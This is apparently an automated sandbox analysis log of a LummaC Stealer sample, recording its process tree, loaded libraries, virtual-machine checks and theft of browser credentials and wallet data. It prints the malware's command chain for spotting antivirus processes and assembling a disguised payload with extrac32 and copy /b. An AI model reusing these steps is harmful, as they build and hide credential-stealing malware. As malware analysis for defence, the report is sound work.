      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 441412Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DiscoveredJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Detailed" Eat Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued SJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com Noted.com SJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BagsThroat.exeStatic file information: File size 1112940 > 1048576
      Source: BagsThroat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: BagsThroat.exeStatic PE information: real checksum: 0x116e13 should be: 0x11ec1a

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comJump to dropped file
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com TID: 6480Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 441412Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DiscoveredJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Detailed" Eat Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued SJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com Noted.com SJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Noted.com, 0000000D.00000000.2054280944.0000000000973000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Speeches.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
